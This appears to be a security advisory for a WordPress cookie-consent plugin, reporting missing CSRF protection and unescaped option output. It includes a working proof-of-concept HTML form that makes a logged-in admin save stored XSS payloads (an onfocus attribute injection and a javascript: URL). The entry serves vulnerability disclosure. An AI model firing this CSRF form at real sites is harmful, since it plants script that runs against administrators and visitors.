The plugin is lacking any CSRF check when saving its options, and do not escape them when outputting them in attributes. As a result, an attacker could make a logged in admin change them to arbitrary values including XSS payloads via a CSRF attack.
<html> <body> <form action="https://example.com/wp-admin/options-general.php?page=wp-cookiechoise" method="POST"> <input type="text" name="send" value="send"> <input type="text" name="cookiechoice_close" value=""> <input type="text" name="cookiechoice_more" value='" autofocus=autofocus onfocus=alert(String.fromCharCode(111,112,115)) e="'> <input type="text" name="cookiechoice_url" value="javascript:alert(String.fromCharCode(111,112,115))"> <input type="checkbox" name="cookiechoice_active" value="1" checked="checked"> <input type="submit" value="submit"> </form> </body> </html>
2021-09-20 (about 10 months ago)
2021-09-20 (about 10 months ago)
2022-04-08 (about 4 months ago)